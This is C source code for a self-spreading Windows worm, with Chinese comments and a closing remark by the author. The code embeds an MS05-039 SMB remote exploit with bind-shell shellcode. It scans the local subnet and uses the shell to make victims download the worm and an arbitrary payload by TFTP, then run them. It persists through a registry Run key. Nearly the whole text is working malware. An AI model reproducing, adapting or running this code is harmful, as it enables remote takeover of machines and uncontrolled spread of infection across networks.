"/xEB/x08/x90/x90/x67/x15/x7a/x76/xEB/x08/x90/x90/x67/x15/x7a/x76"
"/xEB/x08/x90/x90/x67/x15/x7a/x76/xEB/x08/x90/x90/x67/x15/x7a/x76"
"/xEB/x08/x90/x90/x67/x15/x7a/x76/xEB/x08/x90/x90/x67/x15/x7a/x76"
/* jmp over - entry point */
"/xEB/x08/x90/x90"
/* pop reg; pop reg; retn; - umpnpmgr.dll */
"/x67/x15/x7a/x76" /* 0x767a1567 */
/* jmp ebx - umpnpmgr.dll
"/x6f/x36/x7a/x76" */
"/xEB/x08/x90/x90/x67/x15/x7a/x76"
"/x90/x90/x90/x90/x90/x90/x90/xEB/x08/x90/x90/x48/x4F/x44/x88/x90"
"/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90";
char RPC_call_end[] =
"/xE0/x07/x00/x00/x04/x00/x00/x00/x00/x00/x00/x00";
char bind_shellcode[] =
"/x29/xc9/x83/xe9/xb0/xd9/xee/xd9/x74/x24/xf4/x5b/x81/x73/x13/x19"
"/xf5/x04/x37/x83/xeb/xfc/xe2/xf4/xe5/x9f/xef/x7a/xf1/x0c/xfb/xc8"
"/xe6/x95/x8f/x5b/x3d/xd1/x8f/x72/x25/x7e/x78/x32/x61/xf4/xeb/xbc"
"/x56/xed/x8f/x68/x39/xf4/xef/x7e/x92/xc1/x8f/x36/xf7/xc4/xc4/xae"
"/xb5/x71/xc4/x43/x1e/x34/xce/x3a/x18/x37/xef/xc3/x22/xa1/x20/x1f"
"/x6c/x10/x8f/x68/x3d/xf4/xef/x51/x92/xf9/x4f/xbc/x46/xe9/x05/xdc"
"/x1a/xd9/x8f/xbe/x75/xd1/x18/x56/xda/xc4/xdf/x53/x92/xb6/x34/xbc"
"/x59/xf9/x8f/x47/x05/x58/x8f/x77/x11/xab/x6c/xb9/x57/xfb/xe8/x67"
"/xe6/x23/x62/x64/x7f/x9d/x37/x05/x71/x82/x77/x05/x46/xa1/xfb/xe7"
"/x71/x3e/xe9/xcb/x22/xa5/xfb/xe1/x46/x7c/xe1/x51/x98/x18/x0c/x35"
"/x4c/x9f/x06/xc8/xc9/x9d/xdd/x3e/xec/x58/x53/xc8/xcf/xa6/x57/x64"
"/x4a/xa6/x47/x64/x5a/xa6/xfb/xe7/x7f/x9d/x1a/x55/x7f/xa6/x8d/xd6"
"/x8c/x9d/xa0/x2d/x69/x32/x53/xc8/xcf/x9f/x14/x66/x4c/x0a/xd4/x5f"
"/xbd/x58/x2a/xde/x4e/x0a/xd2/x64/x4c/x0a/xd4/x5f/xfc/xbc/x82/x7e"
"/x4e/x0a/xd2/x67/x4d/xa1/x51/xc8/xc9/x66/x6c/xd0/x60/x33/x7d/x60"
"/xe6/x23/x51/xc8/xc9/x93/x6e/x53/x7f/x9d/x67/x5a/x90/x10/x6e/x67"
"/x40/xdc/xc8/xbe/xfe/x9f/x40/xbe/xfb/xc4/xc4/xc4/xb3/x0b/x46/x1a"
"/xe7/xb7/x28/xa4/x94/x8f/x3c/x9c/xb2/x5e/x6c/x45/xe7/x46/x12/xc8"
"/x6c/xb1/xfb/xe1/x42/xa2/x56/x66/x48/xa4/x6e/x36/x48/xa4/x51/x66"
"/xe6/x25/x6c/x9a/xc0/xf0/xca/x64/xe6/x23/x6e/xc8/xe6/xc2/xfb/xe7"
"/x92/xa2/xf8/xb4/xdd/x91/xfb/xe1/x4b/x0a/xd4/x5f/xf6/x3b/xe4/x57"
"/x4a/x0a/xd2/xc8/xc9/xf5/x04/x37";
#define SET_PORTBIND_PORT(buf, port) /
*(unsigned short *)(((buf)+186)) = (port)
//这个是worm.cpp
// worm.cpp : Defines the entry point for the application.
//
#include "stdafx.h"
#include "stdafx.h"
#include "shellcode.h"
#include <windows.h>
#include <stdio.h>
#include <shellapi.h>
void convert_name(char *out, char *name)
{
unsigned long len;
len = strlen(name);
out += len * 2 - 1;
while (len--) {
*out-- = '/x00';
*out-- = name[len];
}
}
//********************************************************
//GetShell是.::[ houseofdabus ]::.写的ms05039溢出exploit
//可以得到远程win2k主机的shell,是蠕虫的精华部分
//*********************************************************
int GetShell(char* IP_address)
{
struct sockaddr_in addr;
struct hostent *he;
int len;
int sockfd;
unsigned short smblen;
unsigned short bindport;
char tmp[1024];
char packet[4096];
char *ptr;
char recvbuf[4096];
#ifdef _WIN32
WSADATA wsa;
WSAStartup(MAKEWORD(2,0), &wsa);
#endif
if ((he = gethostbyname(IP_address)) == NULL) {
return 1;
}
if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
return 1;
}
addr.sin_family = AF_INET;
addr.sin_port = htons(445);
addr.sin_addr = *((struct in_addr *)he->h_addr);
memset(&(addr.sin_zero), '/0', 8);
if (connect(sockfd, (struct sockaddr *)&addr, sizeof(struct sockaddr)) < 0) {
return 1;
}
if (send(sockfd, SMB_Negotiate, sizeof(SMB_Negotiate)-1, 0) < 0) {
return 1;
}
len = recv(sockfd, recvbuf, 4096, 0);
if ((len <= 10) || (recvbuf[9] != 0)) {
;
return 1;
}
if (send(sockfd, SMB_SessionSetupAndX, sizeof(SMB_SessionSetupAndX)-1, 0) < 0) {
return 1;
}
len = recv(sockfd, recvbuf, 4096, 0);
if (len <= 10) {
return 1;
}
if (send(sockfd, SMB_SessionSetupAndX2, sizeof(SMB_SessionSetupAndX2)-1, 0) < 0) {
return 1;
}
len = recv(sockfd, recvbuf, 4096, 0);
if ((len <= 10) || (recvbuf[9] != 0)) {
return 1;
}
ptr = packet;
memcpy(ptr, SMB_TreeConnectAndX, sizeof(SMB_TreeConnectAndX)-1);
ptr += sizeof(SMB_TreeConnectAndX)-1;
sprintf(tmp, "%s//IPC$", IP_address);
convert_name(ptr, tmp);
smblen = strlen(tmp)*2;
ptr += smblen;
smblen += 9;
memcpy(packet + sizeof(SMB_TreeConnectAndX)-1-3, &smblen, 1);
memcpy(ptr, SMB_TreeConnectAndX_, sizeof(SMB_TreeConnectAndX_)-1);
ptr += sizeof(SMB_TreeConnectAndX_)-1;
smblen = ptr-packet;
smblen -= 4;
memcpy(packet+3, &smblen, 1);
if (send(sockfd, packet, ptr-packet, 0) < 0) {
return 1;
}
len = recv(sockfd, recvbuf, 4096, 0);
if ((len <= 10) || (recvbuf[9] != 0)) {
return 1;
}
if (send(sockfd, SMB_PipeRequest_browser, sizeof(SMB_PipeRequest_browser)-1, 0) < 0) {
return 1;
}
len = recv(sockfd, recvbuf, 4096, 0);
if ((len <= 10) || (recvbuf[9] != 0)) {
return 1;
}
if (send(sockfd, SMB_PNPEndpoint, sizeof(SMB_PNPEndpoint)-1, 0) < 0) {
return 1;
}
len = recv(sockfd, recvbuf, 4096, 0);
if ((len <= 10) || (recvbuf[9] != 0)) {
return 1;
}
// nop
ptr = packet;
memset(packet, '/x90', sizeof(packet));
// header & offsets
memcpy(ptr, RPC_call, sizeof(RPC_call)-1);
ptr += sizeof(RPC_call)-1;
// shellcode
bindport = 7777;
bindport ^= 0x0437;
SET_PORTBIND_PORT(bind_shellcode, htons(bindport));
memcpy(ptr, bind_shellcode, sizeof(bind_shellcode)-1);
// end of packet
memcpy( packet + 2196 - sizeof(RPC_call_end)-1 + 2,
RPC_call_end,
sizeof(RPC_call_end)-1);
// sending...
if (send(sockfd, packet, 2196, 0) < 0) {
return 1;
}
return 0;
}
//*******************************************************
//繁殖复制 by nick chang
//********************************************************
int propagate(char *IP_address)
{
struct sockaddr_in addr;
struct hostent *he;
int sockfd;
char recvbuf[4096];
#ifdef _WIN32
WSADATA wsa;
WSAStartup(MAKEWORD(2,0), &wsa);
#endif
char szHostname[256];
char *pszAddr;
struct hostent *pHost;
//得到本机的IP地址
if(gethostname(szHostname,sizeof(szHostname))==0)
{
pHost=gethostbyname(szHostname);
if(pHost)
pszAddr=inet_ntoa(*(struct in_addr *) pHost->h_addr_list[0]);
}
//发送3传送文件命令,让远程主机从本机取3个文件
//tftpd32是tftp的服务端,即在每个受害主机上建立一个tftp服务器
//worm 就是这个蠕虫文件本身了
//payload就是一个负载文件,可以是后门,也可以是ddos的客户端
char sendserver[40];
char sendworm[40];
char sendpayload[40];
sprintf(sendserver,"tftp -i %s GET tftpd32.exe/n",pszAddr);
sprintf(sendworm,"tftp -i %s GET worm.exe/n",pszAddr);
sprintf(sendpayload,"tftp -i %s GET payload.exe/n",pszAddr);
if ((he = gethostbyname(IP_address)) == NULL) {
return 1;
}
if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
return 1;
}
addr.sin_family = AF_INET;
addr.sin_port = htons(7777);
addr.sin_addr = *((struct in_addr *)he->h_addr);
memset(&(addr.sin_zero), '/0', 8);
if (connect(sockfd, (struct sockaddr *)&addr, sizeof(struct sockaddr)) < 0) {
return 1;
}
recv(sockfd, recvbuf, 4096, 0);
//向远方主机发送3个取文件的命宁
if (send(sockfd, sendserver, strlen(sendserver), 0) < 0) {
return 1;
}
Sleep(500);
if (send(sockfd, sendworm, strlen(sendworm), 0) < 0) {
return 1;
}
Sleep(500);
if (send(sockfd, sendpayload, strlen(sendpayload), 0) < 0) {
return 1;
}
Sleep(500);
//向远方主机发送执行蠕虫的命宁
if (send(sockfd, "start ee.exe/n", strlen("start worm.exe/n"), 0) < 0) {
return 1;
}
Sleep(500);
if (send(sockfd, "ee.exe/n", strlen("worm.exe/n"), 0) < 0) {
return 1;
}
return 0;
}
//*****************************************************
//蠕虫线程,得到shell和复制by nick chang
//******************************************************
DWORD WINAPI Attack(LPVOID p)
{
int ret;
char *IP_address = (char *)p;
if((ret=GetShell(IP_address))== 0)
propagate(IP_address);
return 0;
}
//********************************************************
//假设mask 255.255.255.0 by nick chang
//*********************************************************
void gethost(char* pszAddr)
{
int i=0;
int j=0;
while(i!=3)
{
if(pszAddr[j] == '.')
i++;
j++;
}
pszAddr[j] = '/0';
}
//********************************************************
//主程序by nick chang
//********************************************************
int APIENTRY WinMain(HINSTANCE hInstance,
HINSTANCE hPrevInstance,
LPSTR lpCmdLine,
int nCmdShow)
{
char szHostname[256];
char *pszAddr;
struct hostent *pHost;
WORD wVersionRequested;
WSADATA wsaData;
int err;
wVersionRequested = MAKEWORD( 2, 2 );
err = WSAStartup( wVersionRequested, &wsaData );
//创建一个互斥量,确保只有一个蠕虫在运行
HANDLE m_hMutex = CreateMutex(NULL, NULL, "wormmutex");
if(GetLastError()==ERROR_ALREADY_EXISTS)
{
return 1;
}
//执行 payload
for(int i =0; i<20;i++)
ShellExecute(NULL,"open","payload.exe","","", SW_SHOW );
//运行tftp服务
ShellExecute(NULL,"open","tftpd32.exe","","", SW_HIDE );
DWORD dwThreadID;
//写入注册表,开机时自动运行蠕虫
HKEY hKey;
char path[] = "c://winnt//system32//worm.exe";
char data_Set[] = "Software//Microsoft//Windows//CurrentVersion//Run";
int len = strlen(path);
RegOpenKeyEx(HKEY_LOCAL_MACHINE,data_Set,0,KEY_WRITE,&hKey);
RegSetValueEx(hKey,NULL,NULL,REG_SZ,(LPBYTE)path,len);
RegCloseKey(hKey);
//得到自己的地址
if(gethostname(szHostname,sizeof(szHostname))==0)
{
pHost=gethostbyname(szHostname);
if(pHost)
pszAddr=inet_ntoa(*(struct in_addr *) pHost->h_addr_list[0]);
}
while(1)
{
//由自己的地址穷举局域网里的其他机器的地址,假设mask255.255.255.0
for(int i=1 ; i<255; i++)
{
gethost(pszAddr);
sprintf(pszAddr,"%s%i",pszAddr,i);
//以这个地址创造攻击线程
CreateThread(NULL,0,Attack,pszAddr,0,&dwThreadID);
Sleep(500);
}
Sleep(30000);//停一段时间在攻击,以免对方直接crash.
}
return 0;
}
在学校实验室测试通过,payload我用了一个毛毛虫的桌面宠物,结果机房里面的机器屏幕上爬满了毛毛虫。。。。。
声明:本人是菜鸟,代码质量不高,有写的不对的地方,请各位高手多多指教
nickchang918@hotmail.com